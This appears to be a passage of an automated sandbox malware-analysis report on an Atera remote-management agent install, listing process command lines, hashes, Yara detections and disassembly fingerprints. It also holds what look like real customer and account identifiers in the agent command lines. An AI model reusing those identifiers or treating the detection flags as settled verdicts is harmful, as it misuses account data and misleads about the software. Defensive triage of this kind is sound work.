                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2637180822.0000018896EAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2654327651.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2638383365.0000018897B33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2646161990.00000188B0344000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2638383365.00000188979E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2637180822.0000018896EF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                                          Start time:05:15:38
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                                                          Imagebase:0x7ff74f230000
                                                                                                                                                                                                                                                                          File size:72'192 bytes
                                                                                                                                                                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                          Start time:05:15:38
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                                          Start time:05:15:38
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Windows\Installer\MSIA9F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7121500 33 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                                                                                                                                                                                                                                                          Imagebase:0x7f0000
                                                                                                                                                                                                                                                                          File size:61'440 bytes
                                                                                                                                                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                                          Start time:05:15:58
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "6be74508-e40c-4e94-a6e8-129eac28e456" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                                                                                                                                                                                                                                                                          Imagebase:0x2ac4fe20000
                                                                                                                                                                                                                                                                          File size:177'704 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FD9DF72620BCA7C4D48BC105C89DFFD2
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000000.1743436849.000002AC4FE22000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1777176033.000002AC50642000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1776963647.000002AC50120000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1776434069.000002AC4FF4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1780162359.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1776434069.000002AC4FF00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1776434069.000002AC4FF09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1776434069.000002AC4FEC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1777274260.000002AC50773000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1777274260.000002AC50783000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1777274260.000002AC50701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                                          Start time:05:15:58
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                                                          Start time:05:16:44
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "76e20853-e7dd-41ac-a560-28cfe22d3466" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                                                                                                                                                                                                                                                                          Imagebase:0x2c452be0000
                                                                                                                                                                                                                                                                          File size:177'704 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FD9DF72620BCA7C4D48BC105C89DFFD2
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2229922038.000002C453663000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2229051950.000002C452CC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2232515933.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2229922038.000002C453673000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2229051950.000002C452D01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2229922038.000002C4536AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2229051950.000002C452CC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2229922038.000002C453637000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2229922038.000002C4535F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2229684773.000002C452F10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2230821396.000002C46BD60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2229051950.000002C452CFD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000017.00000002.2229051950.000002C452D4A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                                                          Start time:05:16:44
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                                          Start time:05:17:00
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "209f7be2-df48-4eff-a817-c4dc20cdcd81" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                                                                                                                                                                                                                                                                          Imagebase:0x20ec3620000
                                                                                                                                                                                                                                                                          File size:177'704 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FD9DF72620BCA7C4D48BC105C89DFFD2
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2390295578.0000020EC378B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2391164954.0000020EC40C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2390676105.0000020EC3800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2390975900.0000020EC39E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2390295578.0000020EC37AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2391164954.0000020EC40D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2391164954.0000020EC4051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2397247663.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2390230194.0000020EC3770000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2390295578.0000020EC37B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2391164954.0000020EC4097000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                                          Start time:05:17:00
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff63e3b0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                            Function 06D51630 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: $q$$q
                                                                                                                                                                                                                                                                            • API String ID: 0-3126353813
                                                                                                                                                                                                                                                                            • Opcode ID: b1d823981d78add71fa21d2c6ffc3c952221e86b8073c62664390f35cbef9d20
                                                                                                                                                                                                                                                                            • Instruction ID: 796c968b9bd4f9d6cedbf21783c85846799bdc51bf1d5f8eeee110748f0045fd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1d823981d78add71fa21d2c6ffc3c952221e86b8073c62664390f35cbef9d20
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4651AC35F012089FDB55DB79D850AAEBBE6FF89250B15822AE815DB750DB309D02CBA0
                                                                                                                                                                                                                                                                            Function 06D51080 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: f5f8348c5cbdf8529ed585367e420b7743f973b1304a04d17f71845280f61f39
                                                                                                                                                                                                                                                                            • Instruction ID: ecfd5cbf0459d51e447e85f8e5f5cfd03147b055c9e7523a4d3305d9297eea35
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5f8348c5cbdf8529ed585367e420b7743f973b1304a04d17f71845280f61f39
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4719435F002149FEF549BB5D854B6EBAE7EFC8210F168029E9069B794DE34DC02CB91
                                                                                                                                                                                                                                                                            Function 06D50C1C Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: 855fefbdf25870b8337158d39e8d400d8f5129b968bd362a53334bffb949c376
                                                                                                                                                                                                                                                                            • Instruction ID: 7a005c65eb0c6316bbedbdd0e10ba4e4e5811ab0220b12412fcb5401d4d771a3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 855fefbdf25870b8337158d39e8d400d8f5129b968bd362a53334bffb949c376
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D51E930A08254AFEB599B64D8547AE7FB2DFC9320F16406ED806EB781CE798C05C7A1
                                                                                                                                                                                                                                                                            Function 06D50E8C Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: d7fadb5b8f7d072e5161e7684f8ea94014dc1465350b075b99508c8884ac990f
                                                                                                                                                                                                                                                                            • Instruction ID: 8b90318f3904685bc8fbcd047e4781a5eb3d512dc00791e7dd25ad5d8a937af9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7fadb5b8f7d072e5161e7684f8ea94014dc1465350b075b99508c8884ac990f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12412A31B002145BEF98AB699860B6E67A7DFC4310F01403DDD06EB780CE359D0AC7E5
                                                                                                                                                                                                                                                                            Function 06D52644 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: 7898aa4dba6a70cd786917d09500bbad7883605b9fece425d15fb48468fa9496
                                                                                                                                                                                                                                                                            • Instruction ID: d80a54d7f6f69206937bc162a682dc1c46dca0b1b858ec311294385400e6835b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7898aa4dba6a70cd786917d09500bbad7883605b9fece425d15fb48468fa9496
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C314621F183540FEF696775682476E3BABCFC5710F0684BADC02CB782DD689D0A43A5
                                                                                                                                                                                                                                                                            Function 06D52764 Relevance: .4, Instructions: 394COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 9044d3e50b33f044991f5d69816813b4e617886352a72797057d648cea032e83
                                                                                                                                                                                                                                                                            • Instruction ID: 3d7c3e3b9307e1ce6ca8e7fac6ce1d55a9276d999d02f3d0022599b465d0c2cb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9044d3e50b33f044991f5d69816813b4e617886352a72797057d648cea032e83
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3E09271D492089F8BC4EFB9944169A7FF1EA5530072147BEC848CA610F7378A02CF91
                                                                                                                                                                                                                                                                            Function 06D523B8 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5ca78a6de99d5b0ac4f2ca1af052055628b36cce8be8604174310918947fcbf4
                                                                                                                                                                                                                                                                            • Instruction ID: fbddb86584606e41f88b576bd51eb8d0238eac0455477a310af5fcf476cbb6a7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ca78a6de99d5b0ac4f2ca1af052055628b36cce8be8604174310918947fcbf4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB512331B052148FCB50CB68D890AAABBF4FF49314B1681A6D818DF6A2DB31DE06C791
                                                                                                                                                                                                                                                                            Function 06D51F08 Relevance: .1, Instructions: 115COMMON
